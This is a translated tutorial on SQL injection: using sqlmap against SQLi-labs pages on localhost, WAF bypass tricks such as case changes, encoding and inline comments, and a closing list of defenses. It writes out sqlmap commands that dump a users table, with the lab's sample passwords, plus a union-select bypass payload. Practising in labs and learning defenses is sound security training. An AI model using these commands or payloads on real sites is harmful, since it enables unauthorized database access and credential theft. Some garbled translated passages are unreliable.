How to analyze SQLMap and SQLi injection defense

Part 1: Using Sqlmap

1.1 Introduction to sqlmap

1. I mentioned some basic statements of sql injection, but manual injection is very troublesome. We can use sqlmap, a powerful sql injection. tool to obtain data.

2. Introduction to sqlmap

(1)#sqlmap is an open source penetration testing tool that can automatically detect and exploit SQL injection vulnerabilities and
interfaces The server that enters the database. It has a very powerful detection engine, a penetration tester with multiple features, access the underlying file system through database fingerprinting and execute commands over an out-of-band connection.

Official website: sqlmap.org

(2)#Supported databases:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB.

(3)#Support multiple injection methods

#UNION query SQL injection (can be combined with query injection)
#Error-based SQL injection (error-based injection)
# Boolean-based blind SQL injection (Boolean injection)
#Time-based blind SQL injection (based on time delay injection)
#Stacked queries SQL injection (multi-statement query injection)

1.2 sqlmap Installation and environment construction

1. Main steps of sqlmap installation

(1) Install python environment--->sqlmap requires python environment

Python download address: https:/ /www.python.org/downloads/release/python-2715/)

sqlmap is better compatible with the Python2.X version. (The installation steps for python are directly to the next step. However, what needs to be modified is the installation path of sqlmap. Here it is changed to C:\Users\Administrator\python. In order to directly enter the sqlmap directory from the command line for more convenient operation)

(2) Do not install Python to Chinese path, and add Python to the environment variable.

(3) Download and install sqlmap, modify the installation directory to C :\Users\Administrator\sqlmap

(4) Test the python environment: Enter the cmd command line, enter python,The following prompt will indicate a successful installation

C:\Users\ Administrator>python
Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:37:19) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.

>>> exit();

(5) sqlmap test: Enter the cmd command line and enter sqlmap.py -h (note the path)

C:\Users\Administrator\sqlmap>sqlmap.py -h #View help information

1.3 Common parameters of sqlmap

#(1) Get library name, column name, permission

• --dbs #Get all databases

• ##--dbms mysql #Specify database type

• --users #All database users ( Database local user name)

• --passwords #Get the database password, (can only be read if you have permission)

• --technique #Specify to use Which injection type

• --current-db #Current database

##--banner #Get database identification
-D database_name --tables #-D is used to specify data, --tables gets the tables under a certain library
-D database_name -T table_name --columns #-T specifies the table name, --columns gets the column fields
-D database_name -T table_name -C column_1,column_2 --dump
•             #-C specifies the field name,- -dump display results

  
  

--users #Column database management users. When the current user has permission to read tables containing all users, all management users can be listed.
--current-user #The user who manages data can be obtained in most databases.
--is-dba #Determine whether the current user is management. If so, True will be returned.
--privileges #When the current user has permission to read the table containing all users, it is likely to list the permissions of each user, and sqlmap will tell you which one belongs to the database Super administrator. You can also use the -U parameter to specify the permissions of the user you want to see.
--proxy #Specify a proxy server eg: –proxy http://local:8080

(2) Specify prefix and suffix:

• #sqlmap cannot detect many interference characters. When closing, you can manually specify the prefix and suffix

• select * from users where id=((('1 '))) and 1=1

• #--prefix=PREFIX Inject payload string prefix

• #--suffix=SUFFIX Inject payload String suffix
  eg: sqlmap -u "www.target.com/index.php?id=1" -p id --prefix "'))"
  --suffix "AND ('1'= '1"

#(3) Export results:

• ##sqlmap -u "www.a.com/ 1.php?id=1” --file-write=”d:/1.txt”

• --file-dest=”E:/wwwroot/web/one. php "

• --batch fully automatic

• --start=start number--stop=end number

• --dump Export data

• --dump-all Export all data

• --purge-output/ --purge Clear cache directory

• --sql-shell Rebound sqlshell, similar to sql query analyzer Default path.sqlmap (click sqlmap)

1.4 Practical examples of sqlmap

#Less-1--Less65 general statements (these are the most commonly used parameters, must be understood)

#(1) Get all library namesC:\Users\Administrator\sqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -- dbs --dbms=mysql --batch

# Analysis:

-u followed by url indicates the test url

--dbs indicates Get all databases

--dbms means that the specified database type is mysql

--batch means to get it automatically

-D security --tables means to get the tables of the specified database as security Name

-D security -T users --columns means to obtain the column names in the users table in the specified database as security

-D security -T users -C username,password --dump # Obtain the data information of the username and password fields in the security library and users table. --dump means displaying the results

#Result:[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp
[*] performance_schema
[*] security
[*] test

#(2) Get the current library nameC:\Users\Administrator\sqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" --current -db --batch

#Result:current database: 'security'

#(3) Get the current table nameC :\Users\Administrator\sqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security --tables --batch

# Result:Database: security
[4 tables]
----------
| emails |
| referers |
| uagents |
| users |
----------

#(4) Get the current column nameC:\Users\Administrator \sqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security -T users --columns --batch

#Result: Database: security
Table: users
[3 columns]
---------- -------------
| Column | Type |
---------- -------------
| id | int(3) |
| password | varchar (20) |
| username | varchar(20) |
---------- -------------

#(5) Get the username and password contents in the users table C:\Users\Administrator\sqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security -T users -C username,password --dump --batch

#Result:Database: security
Table: users
[13 entries ]
---------- ------------
| username | password |
---------- --- ---------
| Dumb | Dumb |
| Angelina | I-kill-you |
| Dummy | p@ssword |
| secure | crappy |
| stupid | stupidity |
| superman | genious |
| batman | mob!le |
| admin | admin |
| admin1 | admin1 |
| admin2 | admin2 |
| admin3 | admin3 |
| dhakkan | dumbo |
| admin4 | admin4 |
---------- ------------

Part 2: WAF bypass for sqli injection

2.1 Introduction to WAF bypass method for SQL injection

Note: Here are only examples to illustrate the bypass method, the actual scenario is more complicated Complex. Multiple bypass methods can be mixed and encoded.

1. After knowing the method of sql injection, how can we prevent sql injection?

• #(1) Filter comment character

• (2) Filter and or or

• #(3) Filter select Or union

• #(4) Filter blacklist

2. What are the filtered and/or bypass methods?

• #(1) Mysql is not case sensitive and can be executed correctly;===>Use case deformation

• #(2)mysql supports hexadecimal, use hexadecimal or URL encoding;

• #(3)Replace words with symbols = ==> Symbol bypass and(&&) or(||)

• #(4) Inline comments and multi-line comments===>Add comments in sensitive words a/**/nd Double write bypass oORr

3. Of course there are other methods. Let’s take these filtering methods as examples to talk about how to bypass.

There are waf devices in real scenarios, and waf actually prevents sql injection by filtering some keywords.

2.2 SQL injection bypass waf experiment

1. Filter the annotation (Less- 23 as an example)

#(1) Reasons for filtering comment characters: For normal SQL statements, comment characters play a descriptive role. However, in the process of exploiting SQL injection vulnerabilities, comment characters play the role of closing single quotes, multiple single quotes, double quotes, single brackets, and multiple brackets.
Single-line comments: -- or --space or
#Multi-line comments: /* Multi-line comment content*/

#(2) Filter function preg_replace
preg_replace(mixed $pattern, mixed $replacement, mixed $subject): Perform a regular expression search and replacement.
$pattern: The pattern to search for, which can be a string or a string array
$replacement: The string or string array used for replacement.
$subject: The target string or string array to be searched and replaced.

#(3) Bypass comment characters:
Using comment characters to filter cannot successfully close single quotes, etc., use another way of thinking and use or '1'='1 Closing single quotes, etc.
http://127.0.0.1/sqli/Less-23/?id=-1' union select 1,database(),'3

2. How to bypass filtered and or or? (Less-25 as an example)

(1) Source code analysis: You can see that or or and is replaced with empty

(2) Operation steps

3. How to bypass filtered spaces? (Less-26 as an example)

(1)Use To act as spaces

4. How to bypass filtered select/union? (Less-27 is an example)

Part Three: SQL Injection Defense

3.1 SQL Injection Defense Method

1. Common protective measures:

#(1), turn off error prompts: display_errors=Off
# in the PHP configuration file php.ini (2), magic quotes (same effect as addslashes): when in php.ini magic_quotes_gpc=On. All single quotes ('), double quotes ("), backslashes (\) and NUL (NULL characters) in the submitted variables will be automatically converted to escape characters containing backslashes
#(3), Filter the data: For example, filter out common keywords such as and/or/union
#(4). Control user permissions to connect to the database: Each library sets an administrator for a single library, do not use root permissions.
#(5), Preprocessing and parameterization (PDO): Process the parameters passed in by the user and return a Boolean value, instead of simply "splicing" the data, thereby avoiding SQL injection.
#(6) Hardware Protection measures (WAF and other hardware)

The above is the detailed content of How to analyze SQLMap and SQLi injection defense. For more information, please follow other related articles on the PHP Chinese website!